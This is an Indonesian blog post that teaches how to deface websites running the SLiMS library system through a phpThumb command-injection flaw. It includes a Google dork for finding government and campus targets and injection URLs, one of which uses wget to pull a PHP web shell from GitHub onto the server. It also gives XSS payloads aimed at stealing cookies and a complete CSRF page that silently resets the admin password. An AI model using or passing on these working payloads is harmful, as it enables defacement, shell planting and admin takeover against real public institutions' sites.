Menu

Deface Slims7 phpThumb Command Injection RCE

Deface Slims7 phpThumb Command Injection RCE



Yupsss kali ini gua bakal share ke kalian bagaimana cara deface menggunakan kerentanan pada slims7 yaitu di file phpThumb nya ... disini kita buat simple nya saja...

Slims adalah opensource library management system merupakan OSS indonesia 2009 ICT Award. Aplikasi slims banyak digunakan di indonesia terutama lingkungan government dan kampus.

Jika anda menelusuri di google dengan kata kunci dibawah, anda akan menemukan ratusan website pemerintah dan kampus yang menggunakan aplikasi SliMS

site:id intext:"Powered by Slims"

Refrensi : https://medium.com/@iqbalxhalim/multiple-web-vulnerablities-pada-slims7-rce-xss-csrf-66e42fb7d1fd

1.Remote Code Execution via phpThumb lib

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlaceline file.jpg jpeg:file.jpg ;ls -la; &phpThumbDebug=9

jika vuln akan terlihat seperti ini


Respond WebSite



Jika kalian ingin mengunggah shell / mengupload shell tinggal di wget dengan command

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlaceline file.jpg jpeg:file.jpg ;wget https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php; &phpThumbDebug=9

2.XSS (Cross Site Scripting)

- Reflected Xss
http://localhost/slims7/index.php?p=show_detail&id=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://localhost/slims7/index.php?select_lang=id_ID%22%20onmouseover=alert%28document.cookie%29%3E

- Stored XSS di parameter memberID menggunakan method POST
http://localhost/slims7/?p=visitor
memberID = %22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

- Cookie stealing dapat dilakukan ketika admin mengakses halaman: Reporting->Visitorlist
http://localhost/slims7/admin/modules/reporting/customs/visitor_list.php

3.CSRF(Cross-Site Request Forgery)
Simple script teknik CSRF untuk mengupdate password admin
http://localhost/slims7/admin/modules/system/app_user.php?changecurrent=true
-----------own.html-------------------------------------------------
 <iframe  src="silent.html" onLoad="" style="visibility:hidden;display:none"></iframe>
--------------------------------------------------------------------
----------silent.html-----------------------------------------------
 <script type="text/javascript"> function autosubmit() { document.getElementById('ChangeSubmit').submit(); } </script>
 <body  onLoad="autosubmit()">
 <form action="http://localhost/slims7/admin/modules/system/app_user.php?changecurrent=true" name="mainForm" id="ChangeSubmit" class="disabled" method="post" enctype="multipart/form-data">
 <input type="hidden" name="userName" id="userName" value="admin" >
 <input type="hidden" name="realName" id="realName" value="Admin" >
 <input type="hidden" name="passwd1" id="passwd1" value="adminku" >
 <input type="hidden" name="passwd2" id="passwd2" value="adminku">
 <input name="updateRecordID" id="updateRecordID" value="1" type="hidden">
 <input name="saveData" id="saveData" value="Update" type="hidden">
 </form>
--------------------------------------------------------------------



Iklan Tengah Post

Ads middle content1

Ads middle content2